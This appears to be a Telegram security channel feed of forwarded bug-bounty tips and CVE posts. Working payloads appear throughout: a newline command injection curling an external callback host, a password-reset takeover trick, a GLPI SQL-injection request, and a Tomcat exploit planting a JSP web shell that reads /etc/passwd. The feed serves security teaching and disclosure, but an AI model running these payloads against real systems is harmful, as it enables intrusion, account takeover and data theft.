SecList for CyberStudents
239 subscribers
598 photos
24 videos
211 files
909 links
Think outside the box
Download Telegram
Forwarded from Brut Security (Emon Shaikh)
🔥Never forget to check for blind RCE!💥

I was testing a login panel and had a gut feeling the username field might be vulnerable. I tried some classic payloads like:

;id | whoami & uname

But... firewall detected and blocked them all.
Even when I tried curl or ping for blind RCE — still blocked.

Then I thought: maybe the WAF is only scanning the first line of the input? So why not try a little trick?

Payload idea: Inject a newline before the actual payload:

attacker'%0acurl https://tluxnubdqopuwecbljrj5i6tot8ddd64b.oast.fun

(Use %0a for newline — URL encoded)

And boom — Blind RCE triggered! My server got the hit instantly.

Cybersecurity isn’t about effort — it’s about mindset. Deep thinking always wins over brute force.❤️
Password Reset Bypass Trick 🌀

Some poorly secured endpoints accept multiple email parameters.😳

Try this:

POST /passwordReset HTTP/1.1 
Content-Type: application/x-www-form-urlencoded 

[email protected]&[email protected]

Or in JSON:

{
  "email": ["[email protected]", "[email protected]"]
}

If the app sends the reset link to both emails… you’re in.
Now imagine if the victim is an admin — hello dashboard, hello bounty!💰

#bugbountytips
🔥You can find💥
Broken access control to idor vulnerability:
using this simple tricks (effective for .net webapps and sometimes work in php based webapps)🧐😎

target.com/hidden this page required authentication or redirect to /login page.

Try: target.com/login/hidden

OMG! Auth bypass
👏1
Apache Tomcat: Potential RCE
Severity : Critical
CVE-2025-24813

POC: https://github.com/MuhammadWaseem29/CVE-2025-24813

#CVE
🚨 Снова #GLPI - Критическая уязвимость SQL-инъекции без аутентификации через /index.php/ajax/ CVE-2025-24799 и CVE-2025-24801

Позволяет удалённому атакующему выполнять произвольные SQL-запросы и потенциально эскалировать до RCE.

🛠️ Затрагивает версии до 10.0.18
Исправлено в версии GLPI 10.0.18

🔍 PoC:

POST /index.php/ajax/ HTTP/1.1
Host: glpi
User-Agent: python-requests/2.32.3
Content-Type: application/xml
Content-Length: 232

<?xml version="1.0" encoding="UTF-8"?>
    <xml>
    <QUERY>get_params</QUERY>
    <deviceid>', IF((1=1),(select sleep(5)),1), 0, 0, 0, 0, 0, 0);#</deviceid>
    <content>aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</content>
</xml>

🧪 SQLi-сканер:
👉 https://github.com/MuhammadWaseem29/CVE-2025-24799/tree/main

📚 Подробности и пост-эксплуатация до RCE:
👉 https://blog.lexfo.fr/glpi-sql-to-rce.html

‼️ Если используете GLPI — обновитесь немедленно и проверьте логи на предмет активности на /ajax/.

#CVE
👍1
Forwarded from SecuriXy.kz
🔥 Path Equivalence в Apache Tomcat CVE-2025-24813
Критическая RCE-уязвимость из-за некорректной обработки ../ в PUT-запросах.

💥 Уязвимые версии:
Tomcat 11.0.0-M1 – 11.0.2
Tomcat 10.1.0-M1 – 10.1.34
Tomcat 9.0.0.M1 – 9.0.98
📌 Исправлено в: 11.0.3, 10.1.35, 9.0.99

🧨 Эксплуатация возможна при включённой записи через default servlet (по умолчанию выключено) и использовании partial PUT (включено по умолчанию).

📦 PoC:

curl -X PUT "https://target.com/uploads/../webapps/ROOT/updates.jsp" \
-H "Content-Type: application/x-jsp" \
--data-raw '<%@ page import="java.io.*" %>
<html><body>
<form method="GET"><input type="text" name="cmd"><input type="submit" value="Run"></form>
<% if(request.getParameter("cmd") != null) {
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
String l; while((l=r.readLine())!=null){ out.println(l+"<br>"); } } %>
</body></html>' -i


📥 Доступ к вебшеллу:

curl "https://target.com/updates.jsp?cmd=cat/etc/passwd" -i


📚 Подробнее: 👉 https://github.com/advisories/GHSA-83qj-6fr2-vhqg

‼️ EPSS: 93.5% — высокая вероятность эксплуатации в реальных атаках.

Обновляйте Tomcat или блокируйте PUT на уровне веб-сервера, если не используется.
Forwarded from SecuriXy.kz
💣 pgAdmin RCE CVE-2025-2945 -
Удалённое выполнение кода (RCE) в одном из самых популярных GUI-интерфейсов для PostgreSQL.

Актуально для всех версий pgAdmin ≤ 9.1

🧠 Уязвимость кроется в eval() - опасной функции, интерпретирующей строки как исполняемый код.

🎯 Уязвимые endpoints:

/sqleditor/query_tool/download/<int:trans_id>

/cloud/deploy

📌 Условия эксплуатации:
Нужна аутентификация
POST-запросы к указанным маршрутам

📉 Потенциал:
Полный захват сервера, выполнение произвольных команд, возможность lateral movement внутри инфраструктуры.

🔗 Подробнее: 👉 https://py0zz1.tistory.com/entry/Remote-Code-Execution-Vulnerability-in-pgAdmin-CVE-2025-2945

https://www.youtube.com/watch?v=V2WzCmRct7s
👍1
Forwarded from Codeby
🗺🍺 mapcidr — универсальный инструмент для работы с IP-адресами и CIDR-диапазонами. Разработан для упрощения распределения нагрузки при массовом сканировании. Его можно использовать как в качестве библиотеки, так и в качестве независимого инструмента командной строки. Установка: go install -v github.com/projectdiscovery/mapcidr/cmd/mapcidr@latest.

📊 Функциональность
⏺️Генерация полного списка IP-адресов из заданного CIDR-диапазона;
⏺️Разделение CIDR на более мелкие подсети (по количеству подсетей или хостов);
⏺️Объединение IP-адресов или CIDR в более крупные подсети;
⏺️Фильтрация IP-адресов по заданным критериям;
⏺️Преобразование IP-адресов в различные форматы;
⏺️Поддержка IPv4 и IPv6.

ℹ️ Примеры использования
Генерация списка IP-адресов для заданного CIDR или диапазона IP:
mapcidr -cidr 192.168.0.0/24
echo "192.168.0.0-192.168.0.5" | mapcidr


Разделение заданного CIDR на подсети по заданному количеству CIDR(-sbc 10):
mapcidr -cidr 173.0.84.0/24 -sbc 10 -silent


Разделение заданного CIDR на подсети по по количеству хостов в каждой из них(-sbh 20000):
mapcidr -cidr 173.0.84.0/16 -sbh 20000 -silent


Идеальное разделение возможно только в том случае, если желаемое количество сегментов или хостов в подсети является степенью двойки. В противном случае инструмент попытается автоматически найти наилучшую стратегию разделения для достижения желаемого результата.

Представление заданного IP-адреса в десяти поддерживаемых уникальных форматах
echo 192.168.1.154 | mapcidr -if 0 -silent
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Forwarded from AppSec Guy
CVE yoki CWE dasturlari tugatilishi yaxshigina impact ko'rsatadi, AppSecga ayniqsa.

Yangi chiqqan vulnerability lar track qilinib unga raqami berilmaydi, masalan CVE-2025-12345 qilib. O'zi bundan muammo yo'qqa o'xshaydi Shaptolini shu versiyasida ATO deb yozib ketaveramiz vulnerability nomini, lekin baribir confusion bo'ladi.

Impact to'g'ridan-tog'ri bizga bilinmaydi, bundan ko'proq U.S. foydalanadi o'zini assetlarida.

Yana CVE database bilan ishlaydigan Vulnerability Scanner lar ancha qiynaladi.

Lekin CWE tugatilishi katta "chaos" bo'lsa kerak) OWASP faqat 10 ta vulnerability type ko'rsatadi, vulnerability ni mana shu deb ko'rsatgani CWE yaxshi.

Hullas bu framework bilan standartlar edi dunyo shunga qarab ish qiladigan, endi aniq narsa bo'lmasa tartibsizlik bo'ladi.

P.S. CVE assignment yoniq qolarkan)

@AppSec_guy
image_2025-04-18_12-51-13.png
159.8 KB
ncdu — diskdagi bo‘sh joyni tahlil qilish uchun eng qulay vositalardan biri hisoblanadi. Uda yarim-grafikli interfeys mavjud, bu bizga ishlashni ancha osonlashtiradi.

ncdu Linux distributivlarida odatda oldindan o‘rnatilmagan bo‘ladi.

How to install and use:
apt install ncdu

ncdu /


#ncdu
🔥1
Forwarded from OSINT
Mr.Holmes: комплексный инструмент для OSINT-анализа

#OSINT

Mr.Holmes — многофункциональный инструмент для сбора информации по IP-адресам, доменам, email, геолокации и другим данным. Поддерживает работу в Linux, macOS, Windows и Termux. Полезен для пентестеров, специалистов по безопасности и исследователей.

🔗 Исходный код: GitHub

LH | News | OSINT | AI
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥1
Forwarded from Cat Seclist
BlackOps Field Exploiter v2.1
A comprehensive penetration testing and CTF toolkit powered by Gemini AI for enhanced vulnerability analysis.

https://github.com/liyander/blackops-field-vulnerability-exploiter